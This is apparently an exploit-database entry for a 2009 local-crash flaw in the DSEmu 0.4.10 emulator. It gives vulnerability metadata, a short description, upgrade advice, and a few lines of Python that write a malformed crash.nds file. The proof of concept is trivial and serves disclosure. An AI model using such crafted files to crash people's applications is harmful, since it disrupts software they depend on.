header-logo
Suggest Exploit
vendor:
DSEmu
by:
l3D
7,5
CVSS
HIGH
Local Crash
119
CWE
Product Name: DSEmu
Affected Version From: 0.4.10
Affected Version To: 0.4.10
Patch Exists: YES
Related CWE: N/A
CPE: a:dsemu:dsemu:0.4.10
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2009

DSEmu 0.4.10 (.nds) local crash

A local crash vulnerability exists in DSEmu 0.4.10 when a specially crafted .nds file is opened. This can be exploited by an attacker to crash the application.

Mitigation:

Upgrade to the latest version of DSEmu.
Source

Exploit-DB raw data:

#!/usr/bin/env python
#DSEmu 0.4.10 (.nds) local crash
#Author: l3D
#Sites: http://xraysecurity.blogspot.com, http://nullbyte.org.il
#IRC: irc://irc.nix.co.il
#Email: pupipup33@gmail.com

blah=open('crash.nds', 'w')
blah.write('w00t'*12)
blah.close()